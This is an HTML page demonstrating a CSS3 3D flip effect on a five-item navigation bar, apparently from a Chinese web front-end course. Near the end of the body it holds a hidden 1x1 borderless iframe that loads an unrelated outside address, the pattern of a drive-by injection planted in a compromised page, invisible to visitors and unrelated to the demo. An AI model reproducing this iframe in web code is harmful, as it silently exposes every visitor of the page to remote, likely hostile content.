<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>CSS3 3D转换</title>
    <style>
        *{
            margin: 0;
            padding: 0;
            list-style:none;
        }
        ul{
            width: 600px;
            margin:100px auto;
        }
        ul li{
            float: left;
            width: 120px;
            height: 40px;
            position: relative;

            transform-style:preserve-3d;

            transition:all 0.8s;
        }
        ul li:nth-child(2){
            transition-delay: 0.2s;
        }

        ul li:nth-child(3){
            transition-delay: 0.4s;
        }

        ul li:nth-child(4){
            transition-delay: 0.6s;
        }

        ul li:nth-child(5){
            transition-delay: 0.8s;
        }


        li span {
            position: absolute;
            left: 0;
            top: 0;
            display: block;
            width: 100%;
            height: 100%;
            text-align: center;
            line-height: 40px;
    }
    
    li span:nth-child(1) {
        background-color: green;
        transform:translateZ(20px);
    }
    
    li span:nth-child(2) {
        background-color: yellow;
        transform:rotateX(90deg) translateZ(20px);
    }
    ul:hover li{
        transform:rotateX(-90deg);
    }
    

    </style>
</head>

<body>
    <ul class="nav">
        <li>
            <span>传智播客</span>
            <span>Web前端</span>
        </li>
        <li>
            <span>传智播客</span>
            <span>Web前端</span>
        </li>
        <li>
            <span>传智播客</span>
            <span>Web前端</span>
        </li>
        <li>
            <span>传智播客</span>
            <span>Web前端</span>
        </li>
        <li>
            <span>传智播客</span>
            <span>Web前端</span>
        </li>
    </ul>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>

</html>
